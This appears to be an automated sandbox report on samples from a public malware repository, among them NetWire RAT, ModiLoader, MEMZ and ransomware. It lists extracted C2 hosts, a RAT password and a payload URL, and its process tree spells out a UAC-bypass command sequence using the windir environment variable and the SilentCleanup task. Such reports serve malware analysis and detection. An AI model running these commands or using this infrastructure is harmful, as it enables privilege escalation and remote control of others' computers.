Analysis
-
max time kernel
436s -
max time network
460s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
08-04-2024 22:09
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://github.com/Da2dalus/The-MALWARE-Repo
Resource
win10v2004-20240226-en
General
-
Target
https://github.com/Da2dalus/The-MALWARE-Repo
Malware Config
Extracted
modiloader
https://drive.google.com/u/0/uc?id=1TcSctGVBajYMA7CFDc158wpvqkpxmkhJ&export=download
Extracted
netwire
tamerimia.ug:6975
vbchjfssdfcxbcver.ru:6975
-
activex_autorun
false
-
copy_executable
false
-
delete_original
false
-
host_id
AAAAA
-
lock_executable
false
-
mutex
CQbRXVuG
-
offline_keylogger
false
-
password
jhbkdcfgvdfgknl
-
registry_autorun
false
-
use_mutex
true
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
NetWire RAT payload 4 IoCs
Processes:
resource yara_rule behavioral1/memory/6532-2250-0x0000000000400000-0x0000000000433000-memory.dmp netwire behavioral1/memory/6296-2301-0x0000000000400000-0x0000000000433000-memory.dmp netwire behavioral1/memory/6532-2325-0x0000000000400000-0x0000000000433000-memory.dmp netwire behavioral1/memory/3116-2328-0x000000001B100000-0x000000001B110000-memory.dmp netwire -
ModiLoader First Stage 5 IoCs
Processes:
resource yara_rule behavioral1/memory/1364-1725-0x0000000010410000-0x000000001047E000-memory.dmp modiloader_stage1 behavioral1/memory/3004-1727-0x0000000010410000-0x000000001047E000-memory.dmp modiloader_stage1 behavioral1/memory/1364-1751-0x0000000010410000-0x000000001047E000-memory.dmp modiloader_stage1 behavioral1/memory/3004-1754-0x0000000010410000-0x000000001047E000-memory.dmp modiloader_stage1 behavioral1/memory/1364-2300-0x0000000010410000-0x000000001047E000-memory.dmp modiloader_stage1 -
Disables Task Manager via registry modification
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exeWScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 5 IoCs
Processes:
6AdwCleaner.exe6AdwCleaner.exe6AdwCleaner.exefodhelper.exeFree YouTube Downloader.exepid process 3116 6AdwCleaner.exe 8156 6AdwCleaner.exe 7208 6AdwCleaner.exe 5616 fodhelper.exe 7548 Free YouTube Downloader.exe -
Loads dropped DLL 1 IoCs
Processes:
fodhelper.exepid process 5616 fodhelper.exe -
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
NetWire.exeNetWire.exe6AdwCleaner.exeFreeYoutubeDownloader.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Qspt = "C:\\Users\\Admin\\AppData\\Local\\Qspt\\Qspt.hta" NetWire.exe Set value (str) \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Qspt = "C:\\Users\\Admin\\AppData\\Local\\Qspt\\Qspt.hta" NetWire.exe Set value (str) \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdwCleaner = "\"C:\\Users\\Admin\\AppData\\Local\\6AdwCleaner.exe\" -auto" 6AdwCleaner.exe Set value (str) \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Free Youtube Downloader = "C:\\Windows\\Free Youtube Downloader\\Free Youtube Downloader\\Free YouTube Downloader.exe" FreeYoutubeDownloader.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
Processes:
flow ioc 188 drive.google.com 189 drive.google.com 191 drive.google.com 224 raw.githubusercontent.com 225 raw.githubusercontent.com 130 raw.githubusercontent.com 131 raw.githubusercontent.com 132 raw.githubusercontent.com -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
MEMZ.exedescription ioc process File opened for modification \??\PhysicalDrive0 MEMZ.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
$uckyLocker.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\Desktop\Wallpaper = "0" $uckyLocker.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
NetWire.exeNetWire.exedescription pid process target process PID 3004 set thread context of 6532 3004 NetWire.exe ieinstal.exe PID 1364 set thread context of 6296 1364 NetWire.exe ieinstal.exe -
Drops file in Windows directory 4 IoCs
Processes:
FreeYoutubeDownloader.exedescription ioc process File opened for modification C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe FreeYoutubeDownloader.exe File opened for modification C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe FreeYoutubeDownloader.exe File opened for modification C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Uninstall.exe FreeYoutubeDownloader.exe File created C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Uninstall.ini FreeYoutubeDownloader.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 5684 2588 WerFault.exe Notepad.exe 6932 2588 WerFault.exe Notepad.exe -
Modifies registry class 1 IoCs
Processes:
cmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000_Classes\Local Settings cmd.exe -
Modifies registry key 1 TTPs 6 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exepid process 8128 reg.exe 7048 reg.exe 7040 reg.exe 6352 reg.exe 6668 reg.exe 7992 reg.exe -
Processes:
6AdwCleaner.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868 6AdwCleaner.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 0400000001000000100000001d3554048578b03f42424dbf20730a3f0f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b00000001000000260000005300650063007400690067006f00200028004100640064005400720075007300740029000000620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff2140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a1d000000010000001000000006f9583c00a763c23fb9e065a3366d557e0000000100000008000000000063f58926d70168000000010000000800000000409120d035d90103000000010000001400000002faf3e291435468607857694df5e45b6885186819000000010000001000000045ed9bbc5e43d3b9ecd63c060db78e5c20000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604 6AdwCleaner.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 5c00000001000000040000000008000019000000010000001000000045ed9bbc5e43d3b9ecd63c060db78e5c03000000010000001400000002faf3e291435468607857694df5e45b6885186868000000010000000800000000409120d035d9017e0000000100000008000000000063f58926d7011d000000010000001000000006f9583c00a763c23fb9e065a3366d55140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff20b00000001000000260000005300650063007400690067006f0020002800410064006400540072007500730074002900000053000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b0400000001000000100000001d3554048578b03f42424dbf20730a3f20000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604 6AdwCleaner.exe -
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 189 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 191 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 193 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 194 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeMEMZ.exeMEMZ.exeMEMZ.exeMEMZ.exeMEMZ.exepid process 208 powershell.exe 208 powershell.exe 208 powershell.exe 5892 MEMZ.exe 5892 MEMZ.exe 5168 MEMZ.exe 5168 MEMZ.exe 5852 MEMZ.exe 5852 MEMZ.exe 6036 MEMZ.exe 5892 MEMZ.exe 6036 MEMZ.exe 5892 MEMZ.exe 5168 MEMZ.exe 5852 MEMZ.exe 5852 MEMZ.exe 5168 MEMZ.exe 5416 MEMZ.exe 5416 MEMZ.exe 6036 MEMZ.exe 5892 MEMZ.exe 6036 MEMZ.exe 5892 MEMZ.exe 5416 MEMZ.exe 5168 MEMZ.exe 5416 MEMZ.exe 5168 MEMZ.exe 5852 MEMZ.exe 5852 MEMZ.exe 5892 MEMZ.exe 5892 MEMZ.exe 6036 MEMZ.exe 6036 MEMZ.exe 5892 MEMZ.exe 5892 MEMZ.exe 5852 MEMZ.exe 5852 MEMZ.exe 5416 MEMZ.exe 5416 MEMZ.exe 5168 MEMZ.exe 5168 MEMZ.exe 5852 MEMZ.exe 5852 MEMZ.exe 5416 MEMZ.exe 5892 MEMZ.exe 5892 MEMZ.exe 5416 MEMZ.exe 6036 MEMZ.exe 6036 MEMZ.exe 5168 MEMZ.exe 5168 MEMZ.exe 5168 MEMZ.exe 5892 MEMZ.exe 5168 MEMZ.exe 5892 MEMZ.exe 5852 MEMZ.exe 5416 MEMZ.exe 5852 MEMZ.exe 5416 MEMZ.exe 6036 MEMZ.exe 6036 MEMZ.exe 6036 MEMZ.exe 6036 MEMZ.exe 5168 MEMZ.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
6AdwCleaner.exe6AdwCleaner.exe6AdwCleaner.exepowershell.exeMEMZ.exeMEMZ.exedescription pid process Token: SeDebugPrivilege 3116 6AdwCleaner.exe Token: SeDebugPrivilege 8156 6AdwCleaner.exe Token: SeDebugPrivilege 7208 6AdwCleaner.exe Token: SeDebugPrivilege 208 powershell.exe Token: SeShutdownPrivilege 6036 MEMZ.exe Token: SeShutdownPrivilege 5852 MEMZ.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
6AdwCleaner.exeFree YouTube Downloader.exepid process 8156 6AdwCleaner.exe 7548 Free YouTube Downloader.exe -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
Free YouTube Downloader.exepid process 7548 Free YouTube Downloader.exe -
Suspicious use of SetWindowsHookEx 64 IoCs
Processes:
6AdwCleaner.exe6AdwCleaner.exe6AdwCleaner.exeMEMZ.exeMEMZ.exeMEMZ.exeMEMZ.exeMEMZ.exeMEMZ.exeMEMZ.exeMEMZ.exeFreeYoutubeDownloader.exepid process 3116 6AdwCleaner.exe 3116 6AdwCleaner.exe 8156 6AdwCleaner.exe 8156 6AdwCleaner.exe 7208 6AdwCleaner.exe 7208 6AdwCleaner.exe 5172 MEMZ.exe 5852 MEMZ.exe 5892 MEMZ.exe 6036 MEMZ.exe 5168 MEMZ.exe 5416 MEMZ.exe 5816 MEMZ.exe 6912 MEMZ.exe 6792 FreeYoutubeDownloader.exe 6036 MEMZ.exe 5852 MEMZ.exe 5168 MEMZ.exe 5892 MEMZ.exe 5416 MEMZ.exe 5852 MEMZ.exe 6036 MEMZ.exe 5892 MEMZ.exe 5416 MEMZ.exe 5168 MEMZ.exe 5852 MEMZ.exe 6036 MEMZ.exe 5168 MEMZ.exe 5416 MEMZ.exe 5892 MEMZ.exe 5852 MEMZ.exe 6036 MEMZ.exe 5892 MEMZ.exe 5416 MEMZ.exe 5168 MEMZ.exe 5852 MEMZ.exe 6036 MEMZ.exe 5416 MEMZ.exe 5168 MEMZ.exe 5892 MEMZ.exe 5852 MEMZ.exe 6036 MEMZ.exe 5168 MEMZ.exe 5416 MEMZ.exe 5892 MEMZ.exe 6036 MEMZ.exe 5852 MEMZ.exe 5416 MEMZ.exe 5892 MEMZ.exe 5168 MEMZ.exe 5852 MEMZ.exe 6036 MEMZ.exe 5168 MEMZ.exe 5892 MEMZ.exe 5416 MEMZ.exe 5852 MEMZ.exe 6036 MEMZ.exe 5416 MEMZ.exe 5892 MEMZ.exe 5168 MEMZ.exe 6036 MEMZ.exe 5852 MEMZ.exe 5168 MEMZ.exe 5892 MEMZ.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
NetWire.exeNetWire.exedescription pid process target process PID 4924 wrote to memory of 1364 4924 NetWire.exe NetWire.exe PID 4924 wrote to memory of 1364 4924 NetWire.exe NetWire.exe PID 4924 wrote to memory of 1364 4924 NetWire.exe NetWire.exe PID 4924 wrote to memory of 1364 4924 NetWire.exe NetWire.exe PID 4924 wrote to memory of 1364 4924 NetWire.exe NetWire.exe PID 4924 wrote to memory of 1364 4924 NetWire.exe NetWire.exe PID 4924 wrote to memory of 1364 4924 NetWire.exe NetWire.exe PID 4924 wrote to memory of 1364 4924 NetWire.exe NetWire.exe PID 4924 wrote to memory of 1364 4924 NetWire.exe NetWire.exe PID 4924 wrote to memory of 1364 4924 NetWire.exe NetWire.exe PID 4924 wrote to memory of 1364 4924 NetWire.exe NetWire.exe PID 4924 wrote to memory of 1364 4924 NetWire.exe NetWire.exe PID 4924 wrote to memory of 1364 4924 NetWire.exe NetWire.exe PID 4924 wrote to memory of 1364 4924 NetWire.exe NetWire.exe PID 4924 wrote to memory of 1364 4924 NetWire.exe NetWire.exe PID 4924 wrote to memory of 1364 4924 NetWire.exe NetWire.exe PID 4924 wrote to memory of 1364 4924 NetWire.exe NetWire.exe PID 4924 wrote to memory of 1364 4924 NetWire.exe NetWire.exe PID 3556 wrote to memory of 3004 3556 NetWire.exe NetWire.exe PID 3556 wrote to memory of 3004 3556 NetWire.exe NetWire.exe PID 3556 wrote to memory of 3004 3556 NetWire.exe NetWire.exe PID 3556 wrote to memory of 3004 3556 NetWire.exe NetWire.exe PID 3556 wrote to memory of 3004 3556 NetWire.exe NetWire.exe PID 3556 wrote to memory of 3004 3556 NetWire.exe NetWire.exe PID 3556 wrote to memory of 3004 3556 NetWire.exe NetWire.exe PID 3556 wrote to memory of 3004 3556 NetWire.exe NetWire.exe PID 3556 wrote to memory of 3004 3556 NetWire.exe NetWire.exe PID 3556 wrote to memory of 3004 3556 NetWire.exe NetWire.exe PID 4924 wrote to memory of 1364 4924 NetWire.exe NetWire.exe PID 4924 wrote to memory of 1364 4924 NetWire.exe NetWire.exe PID 4924 wrote to memory of 1364 4924 NetWire.exe NetWire.exe PID 4924 wrote to memory of 1364 4924 NetWire.exe NetWire.exe PID 4924 wrote to memory of 1364 4924 NetWire.exe NetWire.exe PID 4924 wrote to memory of 1364 4924 NetWire.exe NetWire.exe PID 4924 wrote to memory of 1364 4924 NetWire.exe NetWire.exe PID 4924 wrote to memory of 1364 4924 NetWire.exe NetWire.exe PID 4924 wrote to memory of 1364 4924 NetWire.exe NetWire.exe PID 4924 wrote to memory of 1364 4924 NetWire.exe NetWire.exe PID 4924 wrote to memory of 1364 4924 NetWire.exe NetWire.exe PID 4924 wrote to memory of 1364 4924 NetWire.exe NetWire.exe PID 4924 wrote to memory of 1364 4924 NetWire.exe NetWire.exe PID 4924 wrote to memory of 1364 4924 NetWire.exe NetWire.exe PID 4924 wrote to memory of 1364 4924 NetWire.exe NetWire.exe PID 4924 wrote to memory of 1364 4924 NetWire.exe NetWire.exe PID 3556 wrote to memory of 3004 3556 NetWire.exe NetWire.exe PID 3556 wrote to memory of 3004 3556 NetWire.exe NetWire.exe PID 3556 wrote to memory of 3004 3556 NetWire.exe NetWire.exe PID 3556 wrote to memory of 3004 3556 NetWire.exe NetWire.exe PID 4924 wrote to memory of 1364 4924 NetWire.exe NetWire.exe PID 4924 wrote to memory of 1364 4924 NetWire.exe NetWire.exe PID 4924 wrote to memory of 1364 4924 NetWire.exe NetWire.exe PID 4924 wrote to memory of 1364 4924 NetWire.exe NetWire.exe PID 4924 wrote to memory of 1364 4924 NetWire.exe NetWire.exe PID 4924 wrote to memory of 1364 4924 NetWire.exe NetWire.exe PID 4924 wrote to memory of 1364 4924 NetWire.exe NetWire.exe PID 3556 wrote to memory of 3004 3556 NetWire.exe NetWire.exe PID 3556 wrote to memory of 3004 3556 NetWire.exe NetWire.exe PID 3556 wrote to memory of 3004 3556 NetWire.exe NetWire.exe PID 3556 wrote to memory of 3004 3556 NetWire.exe NetWire.exe PID 3556 wrote to memory of 3004 3556 NetWire.exe NetWire.exe PID 3556 wrote to memory of 3004 3556 NetWire.exe NetWire.exe PID 3556 wrote to memory of 3004 3556 NetWire.exe NetWire.exe PID 3556 wrote to memory of 3004 3556 NetWire.exe NetWire.exe PID 4924 wrote to memory of 1364 4924 NetWire.exe NetWire.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/Da2dalus/The-MALWARE-Repo1⤵PID:3928
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --mojo-platform-channel-handle=4852 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:11⤵PID:5068
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --mojo-platform-channel-handle=5704 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:11⤵PID:4036
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5864 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:81⤵PID:3004
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --mojo-platform-channel-handle=5532 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:11⤵PID:1544
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5224 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:81⤵PID:4420
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --mojo-platform-channel-handle=4100 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:81⤵PID:2192
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --no-appcompat-clear --mojo-platform-channel-handle=6120 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:81⤵PID:2744
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --mojo-platform-channel-handle=6188 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:11⤵PID:4236
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --mojo-platform-channel-handle=6696 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:81⤵PID:4004
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4476 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:81⤵PID:740
-
C:\Users\Admin\Downloads\$uckyLocker.exe"C:\Users\Admin\Downloads\$uckyLocker.exe"1⤵
- Sets desktop wallpaper using registry
PID:2668
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵PID:4564
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --mojo-platform-channel-handle=6552 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:11⤵PID:4992
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --mojo-platform-channel-handle=6692 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:81⤵PID:4052
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5500 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:81⤵PID:4704
-
C:\Users\Admin\Downloads\NetWire.exe"C:\Users\Admin\Downloads\NetWire.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4924 -
C:\Users\Admin\Downloads\NetWire.exe"C:\Users\Admin\Downloads\NetWire.exe"2⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:1364 -
C:\Windows\SysWOW64\Notepad.exeC:\Windows\System32\Notepad.exe3⤵PID:2588
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\Natso.bat" "4⤵PID:6952
-
C:\Windows\SysWOW64\reg.exereg delete hkcu\Environment /v windir /f5⤵
- Modifies registry key
PID:6352 -
C:\Windows\SysWOW64\reg.exereg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "5⤵
- Modifies registry key
PID:6668 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I5⤵PID:6836
-
C:\Windows\SysWOW64\reg.exereg delete hkcu\Environment /v windir /f5⤵
- Modifies registry key
PID:8128 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2588 -s 4284⤵
- Program crash
PID:5684 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2588 -s 4404⤵
- Program crash
PID:6932 -
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"3⤵PID:6296
-
